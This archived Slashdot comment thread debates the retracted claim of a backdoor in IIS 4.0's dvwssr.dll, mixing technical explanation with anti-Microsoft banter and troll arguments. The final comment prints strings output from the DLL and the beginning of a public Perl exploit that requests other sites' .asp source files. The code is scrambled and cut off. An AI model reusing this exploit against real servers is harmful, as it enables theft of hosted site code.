Slashdot Mirror
Microsoft IIS4 Backdoor Claim Retracted
maniack writes: "According to NTBugtraq, the latest reports say that there is no back door in IIS 4.0. As ArsTechnica points out, the story has apparently been blown out of proportion by the press and no security hole exists. " So - anyone know what's /really/ the case? We've got reports from both sides, but it sounds like it's not true now.
Oooh hey---it's the first Microsoft "vaporbug". Lots of press releases spinning the story, but MS doesn't deliver. Jeez. Typical ;-)
----
----
Am I the only one who thinks Microsoft is a misnomer? Perhaps Macrosoft would be a better fit?
Heh, maybe "no security hole exists" in this certain case, but Frontpage is riddled with insecurity like a block of swiss cheese.
Mike Roberto (roberto@soul.apk.net) - AOL IM: MicroBerto
Berto
Don't try to fix the bug, for that is impossible. You must realize the truth: there is no bug.
I'm going to live forever or die trying.
We should try to make Linux and opensource look better instead of try to make its competitors worse. I'm getting sick of all the Microsoft crap on /.
I likes the techie stuff. Gimme!
-- Kirk S
A plot by the Redmond Cabal (tm) (now with ActiveHex) to discredit Eric Raymond!
Eh, who knows/cares, really.
It doesn't affect me either way.
Well, you have to admit bashing Microsoft is almost a national pastime around Linux users.. Sometimes, you just have to think though.. What OS did you start on, when you first touched a PC? For me, it was DOS, of course.. which was made by Microsoft.. not saying that actually bears relation to it, but that they DO make good software at times. Although, come to think of it, who the heck uses Win2000 anyway? Win98 is more stable.. but that's like comparing the two crappiest bands in the place; which one's better? Who cares? C'mon, let MS have a SMALL break. I'm sure they were just having fun.. and in reference to a post about replacing the 404 error with a Netscape-bashing item, that would probably cause even more uproar. (Then again, it could be INCREDIBLY funny.) -- Daddy, what does FORMATTING DRIVE C mean?
My theory is that one of the lower managers recognized the backdoor/bug and did the right thing by reporting it so it can be dealt with. Then upper management decided they didn't like the bad publicity and decided to cover it all up. All of a sudden it wasn't REALLY a back door, just a little problem for a few people. uh huh. I'm convinced. Then again, it's just a theory and I can't back it up.
/*--Why can't I find the QNX OS on any warez sites?
* (above comment useless as of 4-26-2000)
*/
Why is the string is there? It's been found in more than one file. There's gota be a reason it was placed there. Unless if MS hired someone who was going insane.
Do we get an ESR apology as the next story? :-)
Be thankful you are not my student. You would not get a high grade for such a design
Restores a lot of faith after the ESR article. And no, I don't mean any of this in a snotty way. Thanks.
As to the real deal, I was under the impression that there really is a hole, just no backdoor, and way less serious than originally thought.
My own quick summary: If multiple web sites are hosted on a NT4/IIS4 server with FrontPage 98 extensions installed, then webmaster A with web authoring permissions on his own site could potentially inappropriately read the .asp (and possibly the global.asa, but no others) files of webmaster B's web site if he knew where they existed on the same server. Note that to be able to do this, user B would have had to have granted user A read permissions (explicitly, or by giving read access to "Everyone") on those files -- otherwise, user A would be unable to read the files.
There's also the buffer overrun, although I don't know if anyone has successfully been able to exploit yet.
Bottom line: Just delete the dang dvwssr.dll. Do not pass GO, just delete it. I don't know a single person still using Visual Interdev 1.0, and even then you'll just lose the "Link View" feature. I could care less if they ever release a fixed version of this nasty DLL.
Cheers,
ZicoKnows@hotmail.com
Maybe "no security hole exists" in the article above should be rephrased "this particular security hole is phony." It's Microsoft, afterall.
released perl explot for it that works, so i guess that bug (backdoor) IS there.
i know linux geeks sometimes get into hype too much, but that is no reaso to use *bad* words in posts (see VA pos above:)
Read this This is the actual security alert from bugtraq. I've learned not to trust slashdot's security reporting. It tends to be rather uh biased. ESR does security news. Oh yay.
Ian
Wonder how that link from the word contact got in there ;-)
Glückwünsche, haben Sie Slashdot ermordet, indem Sie zum korporativen Druck beugten und Subskriptionen einlei
How often does it happen that the press actually gets their facts straight? Does it feel weird that in this case the story has changed so quickly? First it's a BACKDOOR MAMAAAA help. Then, it's a bad BUG. Then it's nothing at all:
/. talking about the latest HIT on TECHSTOCKS? Is it because Linux suffered alot?) so Microsoft has the money to make everyone go on with their business and shut their mouths.
-There is nothing to see here, folks, just go on with your business, there is nothing going on here, nothing at all! Can't we all just get alone!
Micro$oft has lots of money (BTW. WTF. Why Isn't
I wonder how much (intangeable costs) will MS pay for this blunder?
You can't handle the truth.
Tell me: if someone had made the same claim (hidden backdoor) about Apache, would you have been as quick to believe it? The fundamental answer (which is the point Eric was making) is "No."
-russ
Don't piss off The Angry Economist
Anyone else getting a little annoyed that slashdot has no posted !3! articles pertaining to this? Its getting old REAL fast. Who cares, IIS has tons of bugs, so why post this. You don't post LINUX bugs, you dont post NT bugs. NO ONE CARES. Next Catz' is gunna do a From IIS's Mouth series about teens and how IIS destroyed their lives.
SB.
..so it may not be a backdoor. 2 questions remain:
#1, WTF is that string doing in this dll?
#2, Can Netscape sue for libel?
Since you appear to be the only person doing this work, I suggest you give up the futile effort.
You're getting out what is now *NON-INFORMATION*, which could have been real information, and might have had an effect if you:
A) hadn't broadcasted it with an unnecessarily hateful and spiteful tone and
B) hadn't spammed the article.
Now you'll get moderated down as redundant in all of your posts, instead of getting rated up as insightful. Conflicting viewpoints are not always moderated down. Rarely in fact, and those that do are brought back up and meta moderation takes care of the moderator. Except when you take your role of "town asshole" and everyone gladly takes a shit on you.
Next time, think your "comment" out a bit better, and make sure you leave the unnecessary "fuck the moderators", "this will be moderated down", preaching to the "Trolls of the world", and calling everyone "linux losers" out and maybe people won't be so quickly repulsed.
Someone who immediately comes off as hostile who rants and raves with only a MINIMALLY apparent reason isn't likely to be taken seriously. You are one of those people. Enjoy, as you may have had a message, but screwed yourself.
But that is the annoying thing about Microsoft. Whenever there is even a fake report, they've had such a bad history of denying bugs for days, weeks or even months (I'm still bitter about DOS 6.0....) that when stuff like this happens, you have to take it seriously if you are using their products. It gets awfully frustrating.
Sure, *now* we can say it was probably nothing, but for a while, folks running IIS had to be worried, and waste time and money fixing the problem. The problem didn't exist, but because of Microsoft's unreliable history, people couldn't give them the benefit of the doubt.
Dana
See what Microsoft has to say for questions about the vulnerability. They have found (or been informed of) another vulnerability with the same file and the same remedy (delete the file). The link says that there isn't a backdoor, but it doesn't proclaim the whole security issue as bunk. Obviously, there *are* security issues involved here.
I like Slashdot, let me say this first. I find it informative, insightful, interesting and very often, funny (hey, that's +4!). However I find many things disturbing. From time to time I see the term 'serious journalism' bandied about on Slashdot. I have to state: I don't consider Slashdot serious journalism. I find it a great place to find new and interesting information. I find it a good place to get some really insightful perspectives. But that's really from the Slashdot community. Not from the Slashdot editorial staff. The editorial staff, I think have their own agenda.
Slashdot = Pro-Linux, pro-Open Source, right? Slashdot = Anti-Microsoft. Though it seems to be anti-corporatism, I find that to be less evident.
Many of Slashdot's "celebrities" are Open Source community's big names. It's no secret that Linux and Open Source are the "darlings" of the technology world right now, to some extent. It's also no secret that many of these people have vested interest in companies that base its business on Linux and/or Open Source Software based products.
What I find, then, is that Slashdot's agenda is: 1. Praise Linux, praise Open Source. 2. Get the Linux and Open Source community to all pat each other in the back for being defenders of the free software world. 3. Get rich off of the companies that they have vested interest in.
What this means to me, in a twisted way (I'll admit it's twisted) is that the Community (I'm lumping Slashdot, Linux and Open Source together, rather unfairly too, I know, but I'm doing it anyway) has become an Open Source Microsoft corporations. Think about it. Here are the parallels:
1. Linux = Windows whatever.
2. Open Source Community = Microsoft Developers.
3. Slashdot (and other places) = Microsoft marketing machine.
I'm sure that are many others. But this is what I could think of.
So in a sense, it is distributed (don't we love that word!) corporatism, to some extent. It's a bit of a stretch there, but I think you may see my point. Just because the vested interest is in a bunch of companies doesn't mean that it's not corporatism. The point of corporatism is bottom-line. I don't think that it's so different in the companies that have products based on open-source.
In all fairness, I believe that Open Source has its roots in for-honest-goodness, but I think that the term has now been used for many self-serving people and companies with an agenda to use it as a marketing term.
And in this respect, the largest target for the Community has always been Microsoft. The Community is competing against Microsoft for market share. The Community hides behind "Open Source" as a Good Thing(tm). I find it extremely distasteful the feeding frenzy of every misstep and mishap of Microsoft. I don't love Microsoft, but I find this kind of behavior turns me off to the Community. And I absolutely believe that many are jumping on this bandwagon to bash Microsoft so that the best alternative to Microsoft, Linux and Open Source based products, will win out so that their own vested interest will make them rich. How disillusioning.
That was my first computer. After that, I had an Apple //e with Apple ][ DOS 3.3, and later ProDOS.
Hey, I was nerd before nerd was cool. :)
The point is the same...DOS wasn't the first computer for many of us. Even in the cases where it was, is that a sign of it not sucking ass? My first computer was a piece of crap in most ways! I have no allegiance to TI because of that computer, nor will I cut them any slack. I'm an engineer. I rave over the best technology. All else is vanity.
Vuln-dev FAQ
We've been discussing this on the the vuln-dev mailing list. Here are the relevent threads:
Has anyone verified whether is is valid?
Re: dvwssr.dll (Has anyone verified whether is is valid?)
So far, concensus is that the hole, as first published by RFP, is a little misleading. It looks like a number of Frontpage servers out there may be misconfigured permission-wise, so that using his code will allow grabbing of .asp files and such off the server. Some folks think that under the same circumstances, the same could be done with a copy of Frontpage.
Now, there is a worse hole that the CoreSDI guys have found:
DVWSSR.dll Buffer Overflow Vulnerability in Microsoft IIS 4.0 Web Servers
It's an unrelated hole, that was inspired by RFP's post.
RFP is a pretty sharp guy, so it's very likely he's onto something. It's possible that he overstated things a bit due to default permissions (which means 90% of the sites ARE vulnerable) but I wouldn't write off his work entirely. There will be more to this story Real Soon Now.
In either case, with two major problems related to the same .dll, and a huge embarassement for MS, you WILL see this file patched. :)
And let's not forget MS's word on the subject:
http://www.microsof t.com/technet/security/bulletin/fq00-025.asp
BB
Simple. They didn't intend to. Some programmer could have decided to add one in of their own free will. If they did add one, would you know? How? If they TOLD you would you buy it? No. You stated that yourself. But what if they didn't? Let's hope UCITA isn't passed in your state...
Most all Microsoft products do not include their source code. Had they inserted a backdoor no one would know, or been able to find out with any relative ease. With opensource, said backdoor would never have been allowed into 90% of *nix systems. (the last 10% are suckers who installed untrustworthy binaries from some punk and run 24/7 as root).
There are some corporations that don't intend to make the best product they can and sell it. They compete viciously, sometimes illegally, to crush competition to the point that they don't have to make the best to make money because they can make lots of money selling something that is far from the best they could do (whew!), since there is (or, has been) no option to turn to. Linux/*BSD, quite simply, is going to be near impossible for them to crush, if it can be crushed at all. Lets hope this forces changes.
Slashdot must be right! Microsoft is an evil corporation which only exists to let people break into your computer and see your pr0n!
Acting like an ass doesn't help you.
why would anyone moderate this up? it's a troll. there are real reasons for IPOs, particularly Linux IPOs, to yo-yo, and none of those reasons have to do with VA Linux, ESR, or Linux itself.
The whole market just took a plunge -- after years of clockwork growth. Tech stocks were hit hardest -- particularly recent IPOs, dot-coms, and other computer/IT related stocks. Clearly, interest rates are going to skyrocket, just as all indicators show inflation on the rise. The party's over, folks. It's going to take something earth-shaking (fundamental Fusion/Physics/Science breakthrough) to pull this one out.
Even worse, the recent tech IPOs of RedHat, VA, Caldera, MP3 were started off with unsophisticated "geek" buyers. People who are basically ignorant of anything except the net investing all they had for a quick buck. The institutions quickly followed suit, and everyone bailed out once they saw the peak.
This chump should give it a rest with the Linux bashing, ESR should do his homework before making BS posts, and moderators, KINDLY PULL YOUR HEAD OUT OF YOUR ASS. This guy is either a troll or pathetically ignorant of the stock market, or (most likely) both.
Treatment, not tyranny. End the drug war and free our American POWs.
See my user info for links.
from this note on Microsoft's site, it seems that the phrase was being used as an "obfuscation key" for filenames in HTTP requests involving this component (probably using an XOR scheme, or else they would have called it encryption).
What's happened to Slashdot?
I'm not talking about the error; the correction was prompt and quick. I'm talking about the Trolls.
We've always had trolls. But now it is just crazy.
What prompts people to behave like this on web forums? Do those of us who don't want trolls, do we need to go elsewhere?
How much fun would it be to Troll a forum no one reads?
Sorry for posting off-topic, Slashdot used to be a much nicer place to visit. I think the threshold has been breached; AC posting must go. Perhaps temporarily.
And I used to be a strong supporter for AC posting too. But the rewards no longer outweigh the problems, not when it is like this.
Whatever will we do?
The sad thing is that most people would believe anything about microsoft products when it comes to bugs or backdoors... why? well, they do have a record for having them. Maybe Microsoft should really take a look at the public perception of their software. People use their software, but don't trust the company they buy it from.
Such is the order of things today...
Its spelt "L-I-N-U-X", but pronunced as "Free Beer"
First "home" computer: UCSD P-System on a Sage II hardware. I then moved up to UNIX System V.2 on a Stride 440. I didn't have an IBM compatible PC till the 90's and then only because I could install Linux on it. With the exception of work I don't use MS Windows and even then it's only because they make me. I'm much happier with any UNIX workstation on my desk than I am with a Windows PC.
BTW, have any of you guys tried this command on the linux kernel tree before??
/usr/src/linux
# cd
# egrep -i "fuck|shit|damn" `find . -name '*.c'` 2>/dev/null
It's quite amusing.. It's there.. but I can guarentee that you will not find an INTENTIONAL security hole in the linux kernel.
Ryan Wyler
The parent to this post is the one post on this entire article that is ACTUALLY RELEVANT and has a lot of meaty, relevant links .
--Joe--
Program Intellivision!
Reminds me of the XOR encryption Micros~1 used with synchronization between Windows CE and NT. In that case, the obfuscation key was susageP, Pegasus backward. (Pegasus was the code name for the project that became CE and is not connected with Pegasus Mail.)
Will I retire or break 10K?
I believe the AMA will be recognizing it as a disease soon, and will hopefully a pill to counter act its affects by 2005.
Get your troll pills here. If trolls are playing Vitamins on their boxen, they can't be trolling /. at the same time.
The unfortunate thing is that we can't just ignore them either, they will simply try harder to get our attention.
There is a limit as to how hard they will try. Ignore them hard enough (build enough karma to get the +1 bonus, then browse at 2) and they'll stop trying.
Will I retire or break 10K?
Will I retire or break 10K?
Two dlls (dvwssr.dll and mtd2lv.dll) included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack include an obfuscation string that manipulates the name of requested files. Knowing this string and the obfuscation algorithm allows anyone with web authoring privileges on the target host to download any .asp or .asa source on the system. This includes users with web authoring rights to only one of several virtual hosts on a system, allowing one company to potentially gain access to the source of another company's website if hosted on the same physical machine.
If this is true, this is a vulnerability in the environment with multiple users sharing a hosting service (but not with single user as someone probably thought originally).
Anyone disproven this? Or now only vulnerabilities that don't require a local account on the system count as real?
Contrary to the popular belief, there indeed is no God.
Did anyone try this exploit? I don't have my own IIS server and don't want to steal data from other servers, but if this program is proved to work than the security hole really exists.
It was very easy to verify. As soon as I heard the story, I tried to verify it, by installing IIS, etc, and was unable to.
Looks like the press got suckered in to reporting an urban legend! I hope Bill Gates puts these so-called newspapers out of business for this slanderous coverage.
--- Speaking only for myself,
What if they decided to use for their string something like the following: "I've seen a report compiled by private detectives that detail a very sordid private life by Sun CEO Scott McNealy. It appears that various times within the last 24 months, he has forced subordinates, both female and male -- one a 16-year old high school exchange program coder -- into engaging in sexual acts with him under the threat of losing their jobs. Our source indicates that all employees -- some current employees and some who have departed -- were paid off with a secret discretionary fund controlled by Sun's board of directors."
Now, any reporter making something like that up would get their testes sued off, but what if a company purposesly put it into a common library, knowing that it'd be found, just biding time until someone looked at it with a hex editor? Yeah, it's pretty far out there on the realm of possibilities, but I have a hard time believing that a new judge would keep the precedent set by the one you mentioned in such a case.
Cheers,
ZicoKnows@hotmail.com
Eric - what have you to say now. All your 'insights' and 'inspirations' are proven wrong Yeah, facts, unlike your posts. When VA Linux hit $300 on opening day, you all blabbed about how important it was for the linux community. You said "it's nice to see that investors get it!". Well, now that VA Linux is a loser to anyone who still owns shares, what does that say? You said investors 'Got It', and I think you are right, they still get it. Linux is nothing. It's not important. It's insignificant. It's 28 and plummeting fast. You guys get all high and mighty whenever there is pro-linux or anti MS news, where is all your comments about this news? Why the silence? Surely it rates as a story since VA Linux was a story whenever there was any other news about it. Go ahead linux losers, moderate me down. Trolls of the world, copy this message, and make sure it's posted 100 times in each article. We'll get the message out regardless of what the moderator queer linux lovers think
Oh wait... lemme guess. You lost money in stocks and now you need a scapegoat.
Stocks are not a lot different from gambling. You win some you lose some. Get over it and stop whining you ninny.
"Free your mind and your ass will follow"
Netscape software sucks. Even Netscape's parent company AOL admits IE is better. After all, when you subscribe to AOL, you get Internet Explorer.
--- Speaking only for myself,
Why don't we worship the guy that wrote ls instead.
Hmm or better yet how about we all agree to go back to having our own thoughts. Then get back to posting interesting stuff.
Last one in jail is a fascist.
I drive a Honda, and I love my Honda. I do not spend most of my waking hours evangalizing about why Toyotas are inferior cars. I'm content to drive the car I want to drive.
You all have lost sight of the fact that a computer is only a tool. And if your wise, you will put your biases and prejedices aside and use the best tool for the given application!.
Linux [ and open source ]. Is not always the best solution to a given problem.
The hypocrisy of your animosity is enormous. Would you have a PIII650 with 256MB if it wasnt for Windows being directly responsible for expanding the user base of PC's and thereby lowering the prices for everyone ( that includes you Linux user ).
If you do not like it, do not use it. Your energies would be better spent taking care of the problems in your house instead of sweeping them under the rug.
And, in case your curious what my tools of choice are: Win2000 ( which works great ) and BeOS ( which works even better! ).
The inability of the older generation to learn from the younger generation is the reason for the gap.
no sig.
I'm sorry if you lost your shirt, or if you have a vendetta, Mr. Oog, but don't you think there is a better way to say this.
And can anyone imagine Micro$oft allowing someone to post these kind of comments about their business on their web site? Repeatedly?
Hopefully I didn't put any [] around my words.
It's really a brilliant scheme; they get so many pageviews from this due to all the inaccurate info that needs to be corrected through so many user messages.
- Jeremy Fuller
If there is no bug, then why did Microsoft ask its customers to delete the dll file? "Shh.. if we tell them theres no bug, then no one will continue looking.."
jeeves, fetch me my weed whaCka.
Hmm you know I might actually like that feature,
ie a maximum score of posts to display. Moderators might like to skims articles and ignore everything thats already high scored and look for new posts to moderate on. It may be useful in fact in keeps all the trolls away fom the regular posts, ie trolls reading at a max score of 0, while normal people read at a minimum of 1 or so (that really should be the non-login default minimum btw).
Just my $0.02..
What I find, then, is that Slashdot's agenda is: 1. Praise Linux, praise Open Source. 2. Get the Linux and Open Source community to all pat each other in the back for being defenders of the free software world. 3. Get rich off of the companies that they have vested interest in.
Ah, but the encouraging thing is-- if Slashdot readers consist entirely of backslapping open-source bigots, why was your comment moderated to a +4? Why was the top-rated comment about the `Geek Pride' festival one that said, I think, that meeting Eric Raymond would be `about as enticing as a headwound'? Certainly among the Slashdot Illuminati, there's a strong voice of dissent to the party line.
I get the impression that the majority of the comments you read on Slashdot represent the views of a group of kneejerk reactionary teenagers who, like you do when you're a teenager, are trying to find their niche to fit in. The sometimes heady political atmosphere of Linux advocacy is ideal for this sort of self-definition, gives you something to talk about at parties etc. (but does not, repeat not impress girls, take note. Skateboarding is still good for something. )
Anyhow, I think the guys that run this site do a smashing job of keeping us posted. I don't think they have an agenda, but their attitude, like that of most balanced Linux users, is parallel to Linus' when he said jokingly that the purpose of Linux was to `conquer the world'. Slashdot's stories need to be taken with this sort of tongue-in-cheek comment in mind-- yeah, so MS has a dodgy DLL, big deal we will now inherit the earth bwahahaha... you're hardly meant to take it as serious political commentary. But I think the teeny contingent take it seriously and flood the comments boards with Borg-like efficiency because, well, they're just following a crowd like teenagers do.
Hmmm, bit of a ramble. But you get my drift. I don't think Slashdot is going to be descending into back-slapping hell for a long while, and there are some really incisive, decent comments being moderated up. And let's not let ESR do security reports in future, because although he's written some good essays and software, he does have an annoying habit of posting complete tripe here.
Matthew @ Bytemark Hosting
> of all the thousands of eyes looking at the code, someone will find it quicker than someone will find it in closed programs
An interesting experiment would be to put a comment in some obscure piece of Linux kernel or utility code, saying "This is a survey. If you find this comment, send a message to whoever@wherever, and don't mention it to anyone. In a year I'll report on how many pairs of eyes have spotted it. (P.S. - Let me know if you only have one eye.)"
--
Sheesh, evil *and* a jerk. -- Jade
That's how you tell the first-class OSes from the cheap imitations: the first-class ticket throws in lots of extras that you can delete without doing any harm to the system.
.dll roulette? Give me an account on your system and then we'll take turns deleting files, and whoever deletes something that makes the system crash loses.
Hey! Anyone up for a game of
--
Sheesh, evil *and* a jerk. -- Jade
you don't know how much of those ESR (or anyone) sold off
FWIW, Everyone knows how much ESR has sold off: exactly zero shares. He's not allowed to sell any until 6 months after the IPO, which will be in June. At the current rate, VA Linux could be a penny stock by that point, especially after that recent report showing how they were trounced by the competition in the sale of Linux computers. Honestly, by the way that they're dwarfed by the other hardware vendors, companies which are already profitable, what does VA Linux have going for it which would keep this stock from going even lower? They're not looking to turn a profit anytime soon, and today's Wall Street has very little patience for stocks like that.
Cheers,
ZicoKnows@hotmail.com
I'm also aware of the fact that not all of the stuff that comes from MS is THE solution to a problem. The original poster tried to illustrate the fact that people should NOT idealize to the max the technology that is their favorite. Instead, people should keep their eyes OPEN to what is best for the particular problem. This means, besides everybody's favorite piece of software, try to truely convince yourself WHY you would choose for product X if a certain solution is needed.
:). Especially the topic about the certain DLL is funny, how it evolved here into a true devil's tool to hurt people. The reason for that is because MOST people here are too shortsighted: they consider just their favorite piece of software THE solution for EVERY problem.
Sometimes I advice my clients to pick a Unix based solution, sometimes I don't. MS' COM based technology today is my favorite development technology to build with. That doesn't mean I don't look at Linux, *BSD or Solaris.
And that's the point: too much people here start to rant and rave when there is something negative to say about MS, even if it's very small. This site is one of the most hypocrite on the net when it comes to Microsoft, and that's a true entertainmentfactor to consider so that's why I'm here
Which is sometimes true, but also a lot of times not true.
--
Never underestimate the relief of true separation of Religion and State.
read this page on ntbugtraq.com and you'll find 2 articles about the dll. Read them, and you know what's all about.
--
Never underestimate the relief of true separation of Religion and State.
And if there *had* been such a backdoor in Apache, whoever found it could have posted the code rather than just asserting it, so we'd be *right* not to be quick to believe an unsupported assertion.
Unfortunately, the bottom line still stands. While it might be hard to exploit this hole, the fact that it exists continues to raise serious doubts about the Microsoft QC, and other, perhaps more intentional, inclusions.
What OS did you start on, when you first touched a PC?
Define "PC". If I can use my definition, I first touched AMOS, then RSX-11-M-PLUS (without DCL, thank you), then proprietary horrors like the NEC-8023B's OS (unload the heads, seek, load the heads) and the Hitachi Peach. Later, I tried CP/M-80 (2.0 then 2.2, although I did get to work for a while in 1.4). MS-DOS was an unheralded and generally unwanted ever-growing pile of bandaids lurking in the future. And Windows built on this pile (NT was the best thing to ever happen to Windows, and MS are steadily working around that).
[MS] DO make good software at times.
Define "make". NT is an interesting blend of MICA, OS/2 and some other parts, and you could not clearly prove that Microsoft wrote the majority of the code in it. Most, possibly all, of their useable applications were bought in whole or in part (and in most cases, let the seller beware - think "SpyGlass Systems") the applications were not "made" by MS in the normal sense of the word. Bill actually admitted to getting started by stealing other peoples' (buggy! no change there) code out of rubbish bins at Uni, but now sues people for stealing his. To quote Gus the robot, "Oh, now this is fair...".
Got time? Spend some of it coding or testing
Even if there is no security hole at that, webadmins at M$ software using sites should start to think.
This one was no danger.
Who knows really that there is no other, real, backdoor.
Is it responsible to have a web-site running a time bomb?
Give me an account on your system and then we'll take turns deleting files, and whoever deletes something that makes the system crash loses.
/dev/kickme for the Linux kernel - any write to it "drops a bomb" into the kernel's memory space (outbound dirty disk buffers would be good). You could get nice reactions by making copies of /dev/null with that name, once the word got around. (-:
Microsoft already have something like that. SETUP.EXE, I believe it's called.
In the Bad Old Days, we would take turns writing random words into random locations withing a live system's kernel memory space. Last user to write a word wins. The game was called "Bomber" and was written in AlphaBASIC to run on an Alpha Micro AM-100.
Perhaps we should implement
Got time? Spend some of it coding or testing
I drive a Honda, and I love my Honda. I do not spend most of my waking hours evangalizing about why Toyotas are inferior cars. I'm content to drive the car I want to drive.
I drive a Peugeot 504D. I challenge you and your Honda to a duel. In particular, to a joust. (-:
Would you have a PIII650 with 256MB if it wasnt for Windows being directly responsible for expanding the user base of PC's and thereby lowering the prices for everyone
Prophetic. "Would you have cheap fuel if it hadn't been for gas-guzzlers?" I guess what you're trying to say here is that Windows == Edsel, Linux == V-Tech?
BTW, we don't have cheap fuel, it now costs about $5 a gallon in Perth, Western Australia, but most people haven't noticed that because it's sold by the litre here. It also contains enough benzene to defoliate the entire Amazon basin. The parallels with DOS-heritage software are hard to ignore.
my tools of choice are: Win2000 (which works great)
...on selected hardware and with selected applications. Here was I thinking that WINE was bad... oh, well, live and learn. Or just live, it's always your choice. (-:
Got time? Spend some of it coding or testing
(wave hand) These are not the backdoors you are looking for.
What are you some kinda Chevy ore worse yet Dodge Commie?
Come on... Maybe it is not a backdoor... But the fact is -and will remain no matter what they do- that this shows us how insecure closed source applications are... If the purpose of this DLL is not opening up a backdoor... Well, there must be another purpose for calling the Netscape engineers weenies - It must be somewhere else in the code... One more of the infamous MS Easter Eggs? A slightly more perverse and obscure function than what we might imagine? With closed source, we will never know.
Anyway, even if it is just text, I think it shows lack of seriousness for a company as Microsoft...
(What would happen epacsteN were overwritten with 1~sorciM, would we have a working Windows?)
The most probable reason for this being "released" now though is to sell more upgrades, I'm sure.
Tomorrow will be cancelled due to lack of interest
The whole point of the NT Bugtraq community is to help the IT departments of the world spot and repair holes. No one would believe if they "lied" about the bug. Ive been a member of the community on NT Bugtraq for almost a year now, and ive seen some very awesome work done by the people there. They are committed to help, and i think so is Microsoft's security response team, which has played a huge role in that community, along with people like Rain Forest Puppy , who really know their stuff.
Lets give them a little more credit, please
--jay
The first OS I used was the BASIC command-line on the TRS-80 "color computer 2".
Of course that thing does say (c) Microsoft when you boot it up...
BTW, did you know that on a TRS-80 you could type anything with the first three letters "dir" and it would interpret it as a dir command? i.e. "dire wolf" and "dirty liar!" would both list the files on your disk.
"I don't care about the Constitution!" --Bill O'Reilly, November 17, 2009
I will state that most Open Source programmers had nothing to do with the feeding frenzy on Slashdot. A few "luminaries" did, but in general they acted upon what information was reported by Microsoft and NTBugTraq. Given that Microsoft itself was calling it a "back door", I can hardly fault ESR for putting out a long essay about the problem.
Finally: To accuse Open Source people of "corporatism" is silly. People who release code under the GPL do so that others *can't* take ownership and hide it from view, which is what corporatism is all about. Yes we get excited when we see our beliefs vindicated, but this has nothing to do with money. It is interesting that many former Microsoft employees, albeit working in other places hundreds of miles away from Redmond, will still defend their former employer, for the exact same reason: pride of ownership. It is "their" product, and they want to tell the world that it's good stuff and that those who criticize it are weenies. No Borg mind-washing required.
About the only lesson we can learn here is that there would have been no story if it were OSS. The Wall Street Journal would have contacted a local security guru, who would have looked at the source code of the module in question, and said "There's no back door there." No story. The only reason there was a story was because only one company had the source code to this module -- Microsoft -- and the Wall Street Journal had to rely on Microsoft's word. And Microsoft was saying it was a back door.
-E
Send mail here if you want to reach me.
So, in case you haven't red the bug report, the specific password in question is "Netscape engineers are weenies!"
:-)
.asp(s) from it.
Oh, I love Microsoft's well-developed sense of responsibility and mature approach to the market
So I guess people are backing off because you have to have publishing rights, but the ugly part is that you only have to have publishing rights to one of the virutual hosts on a server to get all of the
I'll have to peruse the Ars Technica comments to see why they don't consider this a back-door.
Would you buy a frontdoor that looked nice, but with a lock that you did not know was secure? I think this shows very clearly one of the major differences between Open Source and software products created and owned by vendors like MS.
Look, a lot of people were announcing an NT security hole. Slashdot reported it too. Now, I agree that Slashdot should have a team of investigative reporters who have the tecnical credits to figure out if this is true or not, but that's because I have a very different vision of what Slashdot should be than, say, CmdrTaco. I don't begrude him his site as it is, but feel it would be much more useful as a validating filter on the poor high-tech reporting that goes on in other outlets.
The story is still up in the air as far as I'm concerned. One guy (who, BTW was not the original discoverer of the exploit) is reporting that Microsoft doesn't think there's an exploit.
I want to see some people grab the exploit script (it's on the real bugtraq) and run it against some test servers with valid permissions. Does it work? How invalid do the permissions have to be? Does the Microsoft documentation lead you down the road of "invalid permissions" for settting up virtual hosts?
Many questions need to be answered before this case is closed....
If you run strings on vbrun.dll you'll find numerous occurances of
a ||y__p|4z4D34a||y__p|4z44a||y__p|4z4
D34a||y__p|4z4D3D34a||y__p|4z4D34a||y__p|4z4D34
If I didn't already agree with Eric, I wouldn't bother being the VP of OSI. Isn't that obvious *enough*?
-russ
Don't piss off The Angry Economist
Some ideas at the edge of the bell-curve are good ones. The viability of open source software was a strange idea once. Come to that, so was a computer you could pick up. What's on the lunatic fringe today that's next year's best thing?
And some ideas are sufficiently weird that they're best posted anonymously, even at the price of a Coward label and low Karma. Look at some of the AC postings on this topic, which sure sound like they come from /. regulars.
If we don't leave space for the outsiders and the strange posters, don't we risk becoming a closed community, only expressing the ideas we already agree with?
Anything we do will be abused by a troll somewhere along the line. I'd be sorry to see us throw out the innovation baby out with the troll bathwater.
evilrooster - the email of the species is deadlier than the mail -
Where I have a say in what software goes no a computer (as in my home) Microsoft products are unwelcome, period. If they should decide to behave differently in the future, I might reconsider.
--DF.
Regardless of how you feel about the open source movement, doesn't this recent fiasco indicate that (veteran) computer users have a fear about trusting programs that aren't open to peer review? Just because this 'backdoor' was probably a misunderstanding doesn't mean that there aren't security problems with the current model of releasing only binaries.
What do you think the temptation is for someone at Microsoft, knowing the vast number of computers Windows is going to be preinstalled on, to intentionally add a flaw to a range check or otherwise backdoor the code in a less-than-obvious way? This can happen with open source too, of course, but with a greater risk of detection -- with closed source, we've got no choice but to accept that our vendors have our best interests at heart. And if that doesn't send chills up your spine...
Try not. Do or do not, there is no try.
-- Dr. Spock, stardate 2822-3.
Well the "Netscape engineers are weenies!" string
- -- /file/to/retrieve/source
/_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($fi le)." HTTP/1.0\n\n";
p qrstuvwxyz0123456789";
- --
is really inside the dvwssr.dll thing.
Copying it to you linux box and doing a
strings dvwssr.dll will show you the string
backwards :
C:\InetPub\wwwroot\_vti_bin\_vti_aut\dvwssr.dll
strings dvwssr.dll :
!This program cannot be run in DOS mode.
.text
`.rdata
@.data
.idata
.rsrc
@.reloc
..
..
DVWSSR.DLL
DllMain
GetExtensionVersion
HttpExtensionProc
/global.asa
.asp
!seineew era sreenigne epacsteN
HTTP/1.0 404 Object Not Found
XWebScope Source Retriever
_refresh_acls_
Content-type: text/html
KERNEL32.dll
lstrcmpiA
lstrcpynA
CloseHandle
ReadFile
CreateFileA
lstrlenA
lstrcpyA
GetModuleFileNameA
lstrcmpA
..
..
Well seeing this makes me feel sick in the first
place. If we look at the exploit there is actually
something which makes use of that string. And
there is no discussion about that :
my $key="Netscape engineers are weenies!";
The complete exploit goes like this :
-----------------------------------------------
#!/usr/bin/perl
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
#
# Usage: dvwssr.pl target_host
#
use Socket;
$ip=$ARGV[0];
$file=$ARGV[1];
print "Encoding to: ".encodefilename($file)."\n";
$url="GET
print sendraw($url);
sub encodefilename {
my $from=shift;
